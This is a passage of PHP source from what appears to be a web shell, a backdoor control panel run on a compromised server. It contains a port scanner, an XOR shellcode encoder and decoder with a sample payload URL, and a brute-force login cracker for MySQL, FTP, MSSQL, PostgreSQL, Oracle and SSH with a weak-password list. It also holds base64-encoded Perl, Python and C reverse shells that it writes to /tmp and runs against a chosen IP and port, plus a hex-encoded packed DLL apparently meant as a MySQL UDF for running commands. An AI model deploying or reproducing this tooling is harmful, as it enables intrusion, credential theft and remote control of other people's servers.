		$result = @$shell->Execute($sql);
		$count = $result->Fields->Count();
		for($i=0;$i < $count;$i++){$Field[$i] = $result->Fields($i);}
		echo $result ? $sql.' Done<br>' : $sql.' Faild<br>';
		if(!empty($count)){while(!$result->EOF){for($i=0;$i < $count;$i++){echo $Field[$i]->value.'<br>';}@$result->MoveNext();}}
		$shell->Close();
	}
}
	$shell = NULL;
	echo '</div>';
	return true;
}

//scan port

function Port_i()
{
print<<<END
<div class="actall" style="height:200px;">
<form method="POST" name="iform" id="iform" action="?s=i">
Scan IP<br><input type="text" name="ip" value="127.0.0.1" style="width:600px;">
<br><br>Ports<br><input type="text" name="port" value="21|22|1433|1521|3306|3389|4899|5432|5631|5800|8000|8080|43958" style="width:600px;">
<br><br> <input class="bt" type="submit" value="Scan">
</form><br>
END;
	if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
	{
		$ports = explode('|',$_POST['port']);
		for($i = 0;$i < count($ports);$i++)
		{
			$fp = @fsockopen($_POST['ip'],$ports[$i],&$errno,&$errstr,1);
			echo $fp ? '<font color="#FF0000">Openned Ports ---> '.$ports[$i].'</font><br>' : 'Closed Ports ---> '.$ports[$i].'<br>';
			ob_flush();
			flush();
		}
	}
	echo '</div>';
	return true;
}

//convert shellcode

function shellcode_decode($Url_String,$Oday_value)
{
	$Oday_value = hexdec($Oday_value);
	$$Url_String = str_replace(" ", "", $Url_String);
	$SHELL = explode("%u", $Url_String);
	for($i=0;$i < count($SHELL);$i++)
	{
		$Temp = $SHELL[$i];
		$s_1 = substr($Temp,2);
		$s_2 = substr($Temp,0,2);
		$COPY .= $s_1.$s_2;
	}
	for($n=0; $n < strlen($COPY); $n+=2){$Decode .= pack("C", hexdec(substr($COPY, $n, 2) )^ $Oday_value);}
	return $Decode;
}

function shellcode_encode($Url_String,$Oday_value)
{
	$Length =strlen($Url_String);
	$Todec = hexdec($Oday_value);
	for ($i=0; $i < $Length; $i++)
	{
		$Temp = ord($Url_String[$i]);
		$Hex_Temp = dechex($Temp ^ $Todec);
		if (hexdec($Hex_Temp) < 16) $Hex_Temp = '0'.$Hex_Temp;
		$hex .= $Hex_Temp;
	}
	if ($Length%2) $hex .= $Oday_value.$Oday_value; else $hex .= $Oday_value.$Oday_value.$Oday_value.$Oday_value;
	for ($n=0; $n < strlen($hex); $n+=4)
	{
		$Temp = substr($hex, $n, 4);
		$s_1= substr($Temp,2);
		$s_2= substr($Temp,0,2);
		$Encode.= '%u'.$s_1.$s_2;
	}
	return $Encode;
}

function shellcode_findxor($Url_String)
{
	for ($i = 0; $i < 256; $i++)
	{
		$shellcode[0] = shellcode_decode($Url_String, dechex($i));
		if ((strpos ($shellcode[0],'tp:')) || (strpos ($shellcode[0],'url')) || (strpos ($shellcode[0],'exe')))
		{
			$shellcode[1] = dechex($i);
			return $shellcode;
		}
	}
}

function Shellcode_j()
{
	$Oday_value = '0';
	$Shell_Code = 'http://blog.taskkill.net/mm.exe';
	$checkeda = ' checked';
	$checkedb = '';
	if(!empty($_POST['code']))
	{
		if($_POST['xor'] == 'a' && isset($_POST['number'])){$Oday_value = $_POST['number'];$Shell_Code = shellcode_encode($_POST['code'],$Oday_value);}
		if($_POST['xor'] == 'b'){$checkeda = '';$checkedb = ' checked';$Shell_Code_Array = shellcode_findxor($_POST['code']);$Shell_Code = $Shell_Code_Array[0];$Oday_value = $Shell_Code_Array[1];}
		if(!$Oday_value) $Oday_value = '0';
		if(!$Shell_Code) $Shell_Code = 'could not find the shellcode download url';
		$Shell_Code = htmlspecialchars($Shell_Code);
	}
print<<<END
<form method="POST" name="jform" id="jform" action="?s=j">
<div class="actall">XOR Value:<input name="number" value="{$Oday_value}" type="text" style="width:50px">&nbsp;&nbsp;&nbsp;
<input type="radio" name="xor" value="a"{$checkeda}>encode shellcode with XOR <input type="radio" name="xor" value="b"{$checkedb}>decode shellcode with XOR</div>
<div class="actall"><textarea name="code" rows="20" cols="165">{$Shell_Code}</textarea></div>
<div class="actall"><input class="bt" type="submit" value="Convert"></div>
</form>
END;
	return true;
}

//weak scan

function Crack_k()
{
	$MSG_BOX = 'waiting for message queue......';
	$ROOT_DIR = File_Mode();
	$SORTS = explode('/',$ROOT_DIR);
	array_shift($SORTS);
	$PASS = join(',',$SORTS);
	for($i = 0;$i < 10;$i++){$n = (string)$i; $PASS .= $n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.','; $PASS .= $n.$n.$n.$n.$n.$n.$n.$n.',';}
	if((!empty($_POST['address'])) && (!empty($_POST['user'])) && (!empty($_POST['pass'])))
	{
		$SORTPASS = explode(',',$_POST['pass']);
		$connect = false;
		$MSG_BOX = 'not found';
		for($k = 0;$k < count($SORTPASS);$k++)
		{
			if($_POST['class'] == 'mysql') $connect = @mysql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k]));
			if($_POST['class'] == 'ftp'){$Ftp_conn = @ftp_connect($_POST['address'],'21');$connect = @ftp_login($Ftp_conn,$_POST['user'],chop($SORTPASS[$k]));}
			if($_POST['class'] == 'mssql') $connect = @mssql_connect($_POST['address'],$_POST['user'],chop($SORTPASS[$k]));
                       // if($_POST['class'] == 'pgsql') $connect = @pg_connect("host=$_POST['address'] port=5432 dbname=postgres user=$_POST['user'] password=".chop($SORTPASS[$k]));
                        if($_POST['class'] == 'pgsql') $connect = @pg_connect("host={$_POST['address']} port=5432 dbname=postgres user={$_POST['user']} password={chop($SORTPASS[$k])}");
                        //$connect = @oci_connect('system','oracle','"//localhost/orcl');
                        if($_POST['class'] == 'oracle') $connect = @oci_connect($_POST['user'],chop($SORTPASS[$k]),$_POST['address']);
                        if($_POST['class'] == 'ssh'){$ssh_conn = @ssh2_connect($_POST['address'],'22');$connect = @ssh2_auth_password($ssh_conn,$_POST['user'],chop($SORTPASS[$k]));}
                        if($connect) $MSG_BOX = '[project: '.$_POST['class'].'] [ip: '.$_POST['address'].'] [user: '.$_POST['user'].'] [pass: '.$SORTPASS[$k].']';
		}
	}
print<<<END
<form method="POST" name="kform" id="kform" action="?s=k">
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
<div class="actall">Host <input type="text" name="address" value="localhost" style="width:300px"></div>
<div class="actall">User <input type="text" name="user" value="root" style="width:300px"></div>
<div class="actall">Pass <textarea name="pass" rows="20" cols="165">{$PASS}root,123456,123123,123321,admin,admin888,admin@admin,root@root,qwer123,5201314,iloveyou,fuckyou,kissme,520520,5845201314,a123456,a123456789</textarea></div>
<div class="actall">Crack Project: <input type="radio" name="class" value="mysql" checked>Mysql 
<input type="radio" name="class" value="ftp">FTP<input type="radio" name="class" value="mssql" checked>mssql<input type="radio" name="class" value="pgsql" checked>Pgsql<input type="radio" name="class" value="oracle" checked>Oracle<input type="radio" name="class" value="ssh" checked>SSH</div>
<div class="actall"><input class="bt" type="submit" value="Begin"></div></form>
END;
	return true;
}

//back connect

function Linux_l()
{ 
        echo '<br><br>';
print<<<END
<div class="actall" style="height:100px;"><form method="POST" name="lform" id="lform" action="?s=l">
Your IP: <input type="text" name="yourip" value="" style="width:200px">
Your Port: <input type="text" name="yourport" value="1120" style="width:100px">
Script Used: <select name="use" >
<option value="perl">perl</option>
<option value="python">python</option>
<option value="c">c</option>
</select>
<input class="bt" type="submit" value="Connect"></form><br>
END;
	if((!empty($_POST['yourip'])) && (!empty($_POST['yourport'])))
	{
		if($_POST['use'] == 'perl')
		{
			$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
			"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
			"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
			"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
			"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
			"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
			"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
			echo File_Write('/tmp/b4che10r_pl',base64_decode($back_connect_pl),'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_pl success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_pl faild</font><br>';
			$perlpath = Exec_Run('which perl');
			$perlpath = $perlpath ? chop($perlpath) : 'perl';
			echo Exec_Run($perlpath.' /tmp/b4che10r_pl '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? '<font style=font:11pt color=ff0000>execute command faild</font>' : '<font style=font:11pt color=ff0000>execute command successfully</font>';
		}
                if($_POST['use'] == 'python')
                {      
                        $back_connect_py="IyAtKi0gY29kaW5nOnV0Zi04IC0qLQ0KIyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoiIiINCmJhY2sgY29ubmVjdCBweSB2ZXJzaW9uLG9ubHkgbGludXggaGF2ZS".
                        "BwdHkgbW9kdWxlDQoiIiINCmltcG9ydCBzeXMsb3Msc29ja2V0LHB0eQ0Kc2hlbGwgPSAiL2Jpbi9zaCINCmRlZiB1c2FnZShuYW1lKToNCiAgICBwcmludCAn".
                        "cHl0aG9uIGNvbm5lY3QgYmFja2Rvb3InDQogICAgcHJpbnQgJ3VzYWdlOiAlcyA8aXBfYWRkcj4gPHBvcnQ+JyAlIG5hbWUNCg0KZGVmIG1haW4oKToNCiAgIC".
                        "BpZiBsZW4oc3lzLmFyZ3YpICE9MzoNCiAgICAgICAgdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQogICAgICAgIHN5cy5leGl0KCkNCiAgICBzPXNvY2tldC5zb2NrZXQo".
                        "c29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KICAgIHRyeToNCiAgICAgICAgcy5jb25uZWN0KChzeXMuYXJndlsxXSxpbnQoc3lzLmFyZ3ZbMl".
                        "0pKSkNCiAgICAgICAgcHJpbnQgJ2Nvbm5lY3Qgb2snDQogICAgZXhjZXB0Og0KICAgICAgICBwcmludCAnY29ubmVjdCBmYWlsZCcNCiAgICAgICAgc3lzLmV4".
                        "aXQoKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwyKQ0KICAgIG".
                        "dsb2JhbCBzaGVsbA0KICAgIG9zLnVuc2V0ZW52KCdISVNURklMRScpDQogICAgb3MudW5zZXRlbnYoJ0hJU1RGSUxFU0laRScpDQogICAgcHR5LnNwYXduKHNo".
                        "ZWxsKQ0KICAgIHMuY2xvc2UoKQ0KDQppZiBfX25hbWVfXyA9PSAnX19tYWluX18nOg0KICAgIG1haW4oKQ==";
                        echo File_Write('/tmp/b4che10r_py',base64_decode($back_connect_py),'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_py success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_py faild</font><br>';
                        $pypath = Exec_Run('which python');
                        $pypath = $pypath ? chop($pypath) : 'python';
                        echo Exec_Run($pypath.' /tmp/b4che10r_py '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? '<font style=font:11pt color=ff0000>execute command faild</font>' : '<font style=font:11pt color=ff0000>execute command successfully</font>';
                }      
                        
		if($_POST['use'] == 'c')
		{
			$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
			"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
			"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
			"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
			"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
			"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
			"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
			"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
			echo File_Write('/tmp/b4che10r_bc.c',base64_decode($back_connect_c),'wb') ? '<font style=font:11pt color=ff0000>create /tmp/b4che10r_bc.c success</font><br>' : '<font style=font:11pt color=ff0000>create /tmp/b4che10r_bc.c faild</font><br>';
			$res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
			@unlink('/tmp/b4che10r_bc.c');
			echo Exec_Run('/tmp/b4che10r_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? '<font style=font:11pt color=ff0000>execute command successfully</font>' : '<font style=font:11pt color=ff0000>execute command faild</font>';
		}
		echo '<br>local machine need run (nc -vv -l -p '.$_POST['yourport'].')';
	}
	echo '</div>';
	return true;
}

//mysql udf
function get_code() {
     return "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D55A8E327325A00438D7DA883CE2D656B0763CE457537E59B512FD8B7C1028B8B8596504522D9BE1B6144418D4DA885C977DD1696139C2E06249C238D472834160750D28954283B70800CF2C67526537547C84B6CC025CF070D048CFFFEDF5EBC8549E4200866E4516A28AE11DB6E61BC52F88D2072229D489AB3985D2C1D8B35781C88D11B302A6C37DF5968311659FFFF1151BE82B96D42D6FC84FED51052D985CD06A5091CEBC5BA94506052022C069E0F3981C511788FA404FCF68450228B75087CC0807E09060A4B775B71A85F8B5E0C20D469D9D115CEF92011C8B80D124CB6177EA98AB6E00FC1E0028BC803C604C468141ADF02CC33C98A7DBFB566FBEF5E4CC1E102058D14018955E0803A4D4F586F8F818BB9AA01CC8BF2E266F3A7ED0CF26C164102C0159D0542D875477205B04C2C3908C10D00DA6E0D67EF1968D007001034E90B8795BC59C82DED1533F607B80774C03FFB9009C183C206298A023C2167DF7FE9743C843B1B3C0A741788843530421B46D889846744EBDB7FB907CABBFF6F29B6B53C33D2F3A6753B88954C0BB918D962C860784DB34C76739038C0B10B6C68E803C59378271EEB254A1D8E236534B0301BB135728144C60F4F9400D7493C77C7030B5E382E81D8BB7F1A837C2410027513060405750C5B6464046B5F23C357084F179213C888140525F1ECA263810C5456C9134CD8C9C22CBD4FE485DBCEE499566BF6CFE0FA8BCB2BCE490C0804904BB80768042700E0FE397221F724434558E0FE8108D87B96002F8BFB1B2A2327837CD98BFACBCB5073BCC8855098E0FE8D6FBFAC03B7B10DCC63DC0DAF234B21D18DC47AF02AFA7A568F638FA2C0EB0C0354AD46F2C505EED48821B01A60A081C4112684C3CFF4425689FF3B77D77857040CB911280D108D7C2418F3AB8D4C243B0D069B6C1451AB343101BA0B041B0111E5724E64F06650720D553D8755FD04BA917466380E6E8D542408D731F62D925266181108435C5C8F4F4A761850514F9481106A5CDFBFEACC4044076C1589B424809674C67652DD247C03788C5FB65E56B87B49BCBFF0FF255B3CCCCC8D87D4E1674755E7F0FF42DF86C00D5F613C5D6C7904F74104868B23B8065423740F795CEFDCD7B7A5108902B863C33E1210506AFE5C908E7F40F864FF35A900198E1AB52529582FDDD5B4BFC0ED742E3B932474FA34768B0CB38959BD2DB50A02C304B394751268F7DBBFEDBD2DB37D0EAAFF5408EBC3648F0543236C7286EA8C1A648B9C8184FF83DF7904687510E3520C3951087505CF4D05BBFB5351BB1E18EB0A082489DFDCB7B64B02439D6B0C595BFCEF56433230069F0BF758433030F7A5FAFCD82C10DBD10C74F740E42682B58DD63E3F45F812E11B8D08B67F97AD3E21737B08C1618D0C76B18FEA6EED5F744556558D6B10A80B5D5E410B33BBE85ED633783C25534F0DD41D2B38D3AF560C0E168D36B7DEDDB6C5648F358F550C3B08C77EBF73301A8B348FEBA1B8DBEB1CC9EB15884DD67A5C003F5D16466F684394BC3B8B298B419FCC256BB4031824E1D763D9B66E20CF56BDE8C0E010E24785ED75EC423C0AE0DD5B0D1A7E4DE47F34168D5AFF3ADD766B1B92784D1C8020770D2450EDC3FF4884157559598BC65EC9C3CF8DDCFAF7D7B26B71151008C3B7E0772212C7424B4F0434A759913916BDF01C6C7410131E97DEB2C3568BB5FB05D7383B42565777216A091C1FF8ECA245FBA424020C91EF2059E1DB46ED38CEC7FD85F675032863FCDA7F5E83C60F83E6F056887CA4BCC65CE23B3A6BFC4D5716F6460C4074ECEFB75D15660CB2174D29730510B35652F790357329C54E308374342411FAFEE42B502AF7FF761007176F9B34F5DD7D0525EB128B461C530B5FD2A4D87B1C0059644B2A20B25628752EE34A467A86B386F62C591AE1D81E2DFA85EFFD0A7C092CE61D90280DE157F8ED397D08470F94C0485BC31630077AC31A6E5DF1025B5756391803BA23977D6097CA146A401A0CB8CDDCF7039B4DB4DD40743DFD6E78405720AC597B741356C220D7843337E11962410B5957B4C5DA2E6018CC07835328D00CBC3010E326ABA73DB884FB1147D903CB8BFEEA5A8A4614B8F01759C93A47FF7704A94949608563EF1B385B5E5FC93A00513D7DBB8B3B1C279772148111222E2D10B5B73FF685011773EC2BC88BC40C8BE18B596EB4A32D685036C10C576D747A9BF8BAEB74D9C614F7C64D8B197507F8B77803AB756FEB21F646880747497425FF6BCFBA26291F75EB2D1D5183E303740DEE5EEF66201D2F4B75F38492C3F7C79ED9E0FD2874123AFD8A116A9B3BE93AEE6C182EFA2AD1DBC2F6C82E89FEC7D074AFBAA5DB2FB523FEC70603D083F0E8C28B4F78E1BFF5C604A900948174DE84D2742C84641EF7C26FB7B7B90F580C070875C639EB18818C34DDA3E272090E00046A2BC45A88533F550A3B6CF7EBEE075F75F8B07585A3CCFFEFDE8DC6974E8A11F161698A7101DDBF2B74644F7719148A074638D07415D90BD3D2A573E30A0A75F5FC5F51E242173E10F0078D7E436102FE3B2A50DD4E1DC60238E075C48A410376EDDDEF31188A66FF83C11074DFEBB12F348AC26B74851B9030F28DBC0CC34C05C7DB88DFFC83F8F988CC078FA7DBC668BEA3068E58BEB2427EBB8EDE3CA10E680D075925DEC12DBDD1F7FB12102760891664950803C1EDDB50F3375C32F7750940EE78769BDDD8EB7256641CA4C03968098DCC7BB3D96D345204371B366231A8FF0519627F7FBBC8EB3E6B3BC1752C390D0D7EBDFF07E6FB0AFC0D8E90E128E6320E175A89D8331A64FBC25507514EADD87E11B259BF5833A569A363097D56B457C7105EBDC0D6BB09833D482926C101740547D36EA3040322DAA4C4E809F4AED9996EFFD0080CC113CC04BCB6D410BF4E0F07EB8D01C90C4C6D6FB0BB1737575023F6467926A315ED8034032125F71F0117396C115B083C5BD8B9E241C0D01A8DD4D8B1AE6176BA310E97D801DB78C041E03A9A3A3AD3C57DCD2A7D3B8130AB756C462D6C36BE025E10A882D2F6A840B9EEDAB61BED074AA96604071017DE6EBFF77F3F4E0824FE890E89462F1883657524EF0337F72D6E66A90C0115F981FE8B03BFC75A289C0748750BC03F32AE6ABFFDD7073E3EEE5966F7270801577467420BDCB65FAC3E2BF88D48390E581849A489DEB99EF04E047E10053CFE53DCEB3683FBF6CBFFDFBA198BCB8BC3C1F90583E01F8B0C8D93808D04C002B6F4B2D08196B88498F6F320F399B156A107783A260A4B2CD15C8A9E88E614B7C0C24A0D74885507DF40A12932DF4E0C20EB0FCC16B8760C7CEB080DC2C1C8A50E864C17064802DFBA95A1E6798A1F09DB8975F411BAD06E02EC890F0EF406D1B705D74A8D370641D00939554ABF7DF7EC0F8CDC1780FB207C1304787F0E0FBE50152EC08631717461EB02F8BE2DBCBB0F84C60E94C1F804A70789D00F879A85F652EC30FF24901DB2834803CBB22CDB55CC02D8E0E4FCDCBC6DBB4D5D1D954883E8E43B0403742DC1B55EA20B1F4848840DA8D2C56E6E594039FC082708041CB28C1D0111808002C3128E9EFB2AF9B9509B687613661E6CC80F8D12469B89985B8ED80E27B476CBB2ED170A666C4441D0EBE98AF03EED5C2E641EF0D305BF30E7CE63398D0489361B346FCBDB56AE2E046874206CB880FB7790495E2EA005804DFD10EEC6FFE4203F367514807F0134CA4747271FDA628680771888D0AA8568B7C6ED0D1C0FB6C3F66601802291EC50147E06131E28981DCEB0C18DCC35EB4733181652F39BE127F8670F8F1CE508650F8D9600F9EF43DB5811EBA9847817E8430F849FB96D5D836D70036C100CB8E903AF74A146C6BE3008CCC08B25430BFDF0BD68BEFACAC54BC21921D0ADAED4DEFB894DF844E7B1C92D0E2DE47EB981381229DC7477B37D212AD64E85D220D466833878869FED5DCA094040EBE721CC80C320136B1B74AB408FB8FDF3CAD14DDB955F708DCFF3F006CB1A0D8DAFF1660377862E8848BF578089043A953F5B008DD1D6C5F490323FD80C298EDDBEBDD35A7432040974C5487CE801521C97B3B345FE3A6C59882AF4471A183147BD2002BB8916359DDE6F2CF64580D9CCB97F74170FBF00D1E8E369E652D7D8C3AD2DDC000CBF0E94AE6DB4BE6E81344D50C28D8314670B2D826B25D5165C50CCA2B5AFD483C05E08F05D4B053B6C377540FC0EBCC8D18B851FB082B8F7855082FCC9C6057EB581E69E741429F0003506BE67B324205C595D12AF788432611654562D750DD0C2BB653A29BDB9E06157A758888D8459A619694899ED2C1D0C059E0684B686FB2C805184FD331B23B1CF05F77491C9C15DD4273C602621F62BC1D1F847FD340BDB0582F6288038AF03ECF1D728176B2624FE853D6B2815CC074DBB7B10D410A6FEF65D8A13C645EA3004516377CF60DF678845EBEB4821083BC202EB35D6852E09971B209909669F08CD2DF0EC668909050706F514EB0E296A403C0A69BF1FD6A05FA53A7959EB413D74218519637405404A0C0FBB641B0CF6C099EB250BB7C8F220AFC0ECC908EBE0070E19B8F5C6DB741BE37F177C1AC073115883D2D6E2C30D9FF7DA698BFAC90B1FDEE0B50577DC83E700B27D09161B2D08FD1B2AFCAA3AC0B6FBC60BC77509E40060B733D6DEADD55E614A7F0619EE0F765B5DFDF4995250578AC009C476409C5FDB6E372AC48B66C33007C017112CCBF6DF063E39677E03035DD440F8F847D75CF78818EBB5502B0C027F02A51AEE9B03611880393075A90A009BBBEB24400FC601301A98D825DEFEB1B6F4935DFCF6C3D226F6C716CF5A8386068A2D5C0F0A2BEB47369A970902740B20C1E475E06035B6ED2B75E402F4180C7884BDDB61A91B201EF0C41011CD7C37B703EA1402E45015342C9001D94C3E3104306F6B97DA893E7441058B7EFBBB0B97688E3B78FFDD034347C8502DFC54A443DE9D7E328DE9516EA164CF3B1759984FDB962DD802C7155802F4F860A50AC977AC79A5D7193808FBF97DF729B3456313F9E86DEC99D334B75BE01830031706216D30D1354DA4ACE11B7440C6126F55424F490478DC11BA6D6C74898A02FF0EB6300BB90233E098006C4E9468254A90D68C71D8A3AE4A83B557AFA9E0B06AEA7E21B618B714AB63DB43B9833E0D07207FE3B5B628B5908B5CE81A4BE6775DD73831263C1C35100FBE065746CDE7EC505F363FC34BE26D6C3C72BE9F580081008DAE0673520C083B4163B3A177D951FC1C661D6F8DE0B474E8500F41CC5204B4702D700B30027114E0550798688478EAA3365283702294BC5DF20D50600F6E85C0750F6C60A1FBCF373E5333DB391D15B4282D5DC3431B267E44D8B8013D0E74FB768AED8D700C5540785BFF36FFD70810E0916D800A6AFF7604626BC75EEAD59C14433B487CCED915DB812D1BB81D785DF6568CFDDB41DC7078158184FFD6077415CA2083644457D42DB983867CBE100A06FE2B8F3C763BD13474230774741B647413A8AE012344D398367B845CC52BDCFF007CC45A2067C106D76A07845D1003CA44F85083EAC716DE3C856C6C3407753E576A181F3B1A1F3C8BF8D4336A113542FB8D06BC59078C08005957750ADA0E78B31F78893EEB067A1D84D9607F865F281A805E5D60FF57605AA8B11584CC40A48B4F485801B7B87501172BC5D86E2508B00006B41217B770A0FBACC70505A48BBDA118AD96AFC18DB107B88858F0E16FC47314B5042B500C81FAB27207DB210C6FBB14EBE8EC321C556E34D5880C2E6A41DEF22BA3DF60A36A5AAFC2FC57C1EE7F37AA817FCE8B7AFC69C904D24B448D8C8E1A35C5014469